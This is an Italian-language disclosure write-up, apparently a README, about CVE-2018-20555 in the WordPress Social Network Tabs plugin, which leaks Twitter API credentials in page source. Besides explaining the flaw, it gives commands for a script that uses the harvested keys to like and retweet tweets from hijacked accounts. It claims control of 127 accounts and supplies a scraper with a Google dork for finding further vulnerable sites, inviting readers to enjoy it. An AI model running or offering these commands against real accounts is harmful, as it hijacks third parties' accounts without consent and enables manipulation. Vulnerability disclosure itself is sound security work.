
Vulnerabilità del plugin Social Network Tabs di WordPress - CVE-2018-20555
Il plugin WordPress chiamato Social Network Tabs, creato dall'azienda Design Chemical, rilascia due volte l'access_token, l'access_token_secret, la consumer_key e la consumer_secret di Twitter dei propri utenti, portando alla compromissione del loro account Twitter.
Ciò è causato dalle seguenti righe di codice nella pagina in cui viene mostrato il widget di Twitter:
jQuery(document).ready(function ($) {
var config = {
widgets: "twitter,facebook,youtube",
twitterId: "[redacted]",
facebookId: "[redacted]",
youtubeId: "[redacted]",
twitter: {
url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
title: "Latest Tweets",
follow: "Follow",
followId: "",
limit: "10",
retweets: true,
replies: true,
images: "thumb",
consumer_key: "[redacted]",
consumer_secret: "[redacted]",
access_token: "[redacted]",
access_token_secret: "[redacted]"
},
}
});
Grazie a Publicwww, con le seguenti query di ricerca, sono riuscito a recuperare l'access_token, l'access_token_secret, la consumer_key e la consumer_secret di Twitter da 539 siti web vulnerabili:
Tutte le chiavi sono disponibili in twitter_keys.csv.
Testa le chiavi API di Twitter in twitter_keys.csv
python test_twitter_api_keys.py -t
La prima volta che ho eseguito questo comando, ho ottenuto le informazioni di 446 account Twitter. Vale la pena notare che nella lista c'erano 2 account verificati e diversi account con più di 10.000+ follower. Tutti gli account vulnerabili sono in vulnerable_accounts.txt.
Metti mi piace al tweet che preferisci
python test_twitter_api_keys.py -l [tweet_id]
Fai retweet del tweet che preferisci
python test_twitter_api_keys.py -r [tweet_id]
La prima volta che ho eseguito questo comando, sono riuscito a mettere mi piace al tweet scelto 127 volte, il che ha dimostrato che 127 chiavi API di Twitter avevano i permessi di lettura e scrittura, cioè sono stato in grado di prendere il controllo di 127 account Twitter (cambiare l'immagine del profilo, mettere mi piace, fare retweet, modificare la bio, ...) a causa di questa fuga di chiavi.
Molti siti web e quindi account Twitter sono ancora vulnerabili a questo problema. Per identificarli, ho creato uno scraper
cd TwitterApiKeysSearchEngine/
scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10
Il totale dei risultati per questa query di ricerca su Google è 3550. Nelle prime 9 pagine, sono riuscito a recuperare 78 chiavi (86%). Buon divertimento!
Seguimi su Twitter! Puoi anche trovare una piccola parte del mio lavoro su https://fs0c131y.com
L'indagine e il POC sono stati realizzati con ❤️ da @fs0c131y